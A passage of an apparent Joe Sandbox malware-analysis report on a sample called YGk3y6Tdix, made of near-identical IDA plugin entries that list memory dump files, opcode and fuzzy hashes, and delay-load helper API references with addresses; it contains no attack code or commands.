                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 318e7556cbd34cbaa630d89273d8f4248ea3c877f84aa4ab788bca4cee0c3e3e
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 318e7556cbd34cbaa630d89273d8f4248ea3c877f84aa4ab788bca4cee0c3e3e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: b21b0ce66db8e44b4ae3043f7d1814b638d499eeab145fa3be20ec7a22bfe5c9
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: b21b0ce66db8e44b4ae3043f7d1814b638d499eeab145fa3be20ec7a22bfe5c9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 697ccf18d07ca685cdffed9f69520c5cc57be5de8f1413251ad4148ac769ecfe
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 697ccf18d07ca685cdffed9f69520c5cc57be5de8f1413251ad4148ac769ecfe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 560b1dff0c43d12a900ce1a9369c0abf863cf13538233c4aa405edfedb528ad6
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 560b1dff0c43d12a900ce1a9369c0abf863cf13538233c4aa405edfedb528ad6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: f11989b7e78397894ba47c953c55a6f293fa6c10f8430431393552a48ea45221
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: f11989b7e78397894ba47c953c55a6f293fa6c10f8430431393552a48ea45221
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 67aa53fac8eca700acaacd588a52df3b0d55a982ea4b4e73b10d9d9c8e4d40bb
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 67aa53fac8eca700acaacd588a52df3b0d55a982ea4b4e73b10d9d9c8e4d40bb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 50784e8f3771edd8ffd62af3c03e6f51bdb09474fa9074a570d5bb90bf920638
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 50784e8f3771edd8ffd62af3c03e6f51bdb09474fa9074a570d5bb90bf920638
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: d291f0b323f0502f496425bc404f88c2d083574386eae36b8ee24b40bf736bca
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: d291f0b323f0502f496425bc404f88c2d083574386eae36b8ee24b40bf736bca
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 071de72c990714c0ca50353fd9eb2c4b387cd11262bde111496bafd23122bfb5
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 071de72c990714c0ca50353fd9eb2c4b387cd11262bde111496bafd23122bfb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 2e471dfa2465411e3c9b0665643f02a014d72862f6193d46c659c5cefea8b707
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e471dfa2465411e3c9b0665643f02a014d72862f6193d46c659c5cefea8b707
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: b7ba68011a00324dffbfcb32cc9155b2281e7a09a80a4dad64f1a8b613e3b344
                                                                                                                                                                                              • Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7ba68011a00324dffbfcb32cc9155b2281e7a09a80a4dad64f1a8b613e3b344
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: e51b9107fe542c42de6cfe935f851c475d24ad4881861c14157bc951f33d2199
                                                                                                                                                                                              • Instruction ID: cbafd5fc1183931e7d4aaa79f7746caecb0bad332ed486a2ddeb263d817b141b
                                                                                                                                                                                              • Opcode Fuzzy Hash: e51b9107fe542c42de6cfe935f851c475d24ad4881861c14157bc951f33d2199
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54A011E22A80023C300822022C02CFB028EC0C0B20338802EF828A00C0AC8088003CB3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: f30848f1a3b3c08094b560f97bf75a5335a32b438074d9e1c29b4dea7ff5ac48
                                                                                                                                                                                              • Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
                                                                                                                                                                                              • Opcode Fuzzy Hash: f30848f1a3b3c08094b560f97bf75a5335a32b438074d9e1c29b4dea7ff5ac48
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
